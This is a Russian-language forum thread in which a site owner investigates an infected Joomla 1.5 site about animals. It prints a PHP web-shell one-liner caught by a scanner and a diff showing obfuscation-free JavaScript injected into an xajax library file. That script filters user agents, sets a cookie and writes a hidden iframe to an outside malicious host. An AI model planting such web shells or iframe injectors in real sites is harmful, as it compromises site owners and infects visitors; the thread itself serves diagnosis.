- Сообщений: 84
- Спасибо получено: 3
Как создать и настроить свой веб-сервер на VDS (05 сен 2024)
Осенью самое время заняться установкой и тюнингом своего веб-сервера. Не правда ли?
Сайт про животных
- Unior82
-
- Не в сети
- Давно я тут
-
- Arhitektorius
-
Автор темы
- Не в сети
- Завсегдатай
-
11 года 6 мес. назад #22
от Arhitektorius
Кто-то на ушко мне шепчет, что это как раз был повод 
PS Нашел в папке images "заразные" файлы, но именно pst.php там не было!
Моё хобби стало моей проффесией
Arhitektorius ответил в теме Re: Сайт про животных
Позвольте не согласиться! Вот сегодня, например Инспектор мне прислал такоеЭто ни о чем не говорит. Marco's SQL Injection так и будет верещать по поводу и без повода
Code:
*$_POST DUMP
-[path] => ../../../images/pst.php
-[raw_data] => <?php
eval (base64_decode($_POST["php"]));
?>
PS Нашел в папке images "заразные" файлы, но именно pst.php там не было!
Моё хобби стало моей проффесией
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.
- Aleksej
-
- Не в сети
- Модератор
-
- Arhitektorius
-
Автор темы
- Не в сети
- Завсегдатай
-
11 года 5 мес. назад - 11 года 5 мес. назад #24
от Arhitektorius
Моё хобби стало моей проффесией
Arhitektorius ответил в теме Re: Сайт про животных
Вчера перелил сайт к себе на Бубунту, чтобы проще ковырять было и...
Увидел нижеописанное. Честно, я вообще не понимаю как такое может быть!!! :blink: Кто может сталкивался с таким?
Итак, вот скрин
На скрине слева подключение по фтп к моей убунте (вчерашняя копия сайта), а справа подключение к хостеру, где лежит оригинал файла откуда вчера его копировал. Пониже открытые в редакторе файлы (с каждой стороны соответственно) Файлы разные! В копии я отчетливо вижу "вредоносный код", в оригинале же всё якобы чисто! :blink:
Как такое могло получиться?
PS Кто повнимательнее скажут, дата записи файла 03.07.13. На самом деле я просто его переименовывал... После отката файла на хостинге к вчера, позавчера, сегодня все остается точно также, только дата записи файла меняется на 18.11.12. Кароч давно там лежит, только откуда взялся непонятно... Повторюсь, никаких расширений и т.п. уже год как не ставил (кроме как рукописного снега на JS...)
Увидел нижеописанное. Честно, я вообще не понимаю как такое может быть!!! :blink: Кто может сталкивался с таким?
Итак, вот скрин
На скрине слева подключение по фтп к моей убунте (вчерашняя копия сайта), а справа подключение к хостеру, где лежит оригинал файла откуда вчера его копировал. Пониже открытые в редакторе файлы (с каждой стороны соответственно) Файлы разные! В копии я отчетливо вижу "вредоносный код", в оригинале же всё якобы чисто! :blink:
Как такое могло получиться?
PS Кто повнимательнее скажут, дата записи файла 03.07.13. На самом деле я просто его переименовывал... После отката файла на хостинге к вчера, позавчера, сегодня все остается точно также, только дата записи файла меняется на 18.11.12. Кароч давно там лежит, только откуда взялся непонятно... Повторюсь, никаких расширений и т.п. уже год как не ставил (кроме как рукописного снега на JS...)
Моё хобби стало моей проффесией
Последнее редактирование: 11 года 5 мес. назад пользователем Aleksej.
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.
- Aleksej
-
- Не в сети
- Модератор
-
- Arhitektorius
-
Автор темы
- Не в сети
- Завсегдатай
-
11 года 5 мес. назад - 11 года 5 мес. назад #26
от Arhitektorius
Моё хобби стало моей проффесией
Arhitektorius ответил в теме Re: Сайт про животных
Я и сам уже не понимаю )) Ковыряю из интереса... А жумла у меня ваще полторашная тут!
Стоит плагин XAJAX System Mambot For Joomla 1.5 для чего-то видимо ставил, не спроста же!
А вот как может скопироваться с хоста файл "Не такой как на хосте?" !!!!
Стоит плагин XAJAX System Mambot For Joomla 1.5 для чего-то видимо ставил, не спроста же!
А вот как может скопироваться с хоста файл "Не такой как на хосте?" !!!!
Моё хобби стало моей проффесией
Последнее редактирование: 11 года 5 мес. назад пользователем Arhitektorius.
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.
- Aleksej
-
- Не в сети
- Модератор
-
- Arhitektorius
-
Автор темы
- Не в сети
- Завсегдатай
-
11 года 5 мес. назад #28
от Arhitektorius
Моё хобби стало моей проффесией
Arhitektorius ответил в теме Re: Сайт про животных
Разница в файлах как раз - код зверя
Code:
1,41c1
< //2178hepalo
< (function(){
< function stripos (f_haystack, f_needle, f_offset) {
< var haystack = (f_haystack + '').toLowerCase();
< var needle = (f_needle + '').toLowerCase();
< var index = 0;
< if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
< return index;
< }
< return false;
< }
< function zzz_check_ua(){
< var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0|Firefox/21.0|Firefox/22.0';
< blackList = blackList.split('|');
<
< var blackUA = false;
< for (var i in blackList) {
< if (stripos(navigator.userAgent, blackList[i])!==false) {
< blackUA = true;
< break;
< }
< }
< return blackUA;
< }
< function setCookie(name, value, expires) {
< var date = new Date( new Date().getTime() + expires*1000 );
< document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
< }
< function getCookie(name) {
< var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
< return matches ? decodeURIComponent(matches[1]) : undefined;
< }
< if (!zzz_check_ua()) {
< var cookie = getCookie('ecalu1784b19');
< if (cookie == undefined) {
< setCookie('ecalu1784b19', true, 86400);
< document.write('<iframe src="http://braintube.ru/inspired.took?default" style="position:absolute;left:-1000px;top:-1000px;" height="112" width="112"></iframe>');
< }
< };
< })();
< //caaba91838f8/* xajax Javascript library :: version 0.2.5 */
---
> /* xajax Javascript library :: version 0.2.5 */
Моё хобби стало моей проффесией
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.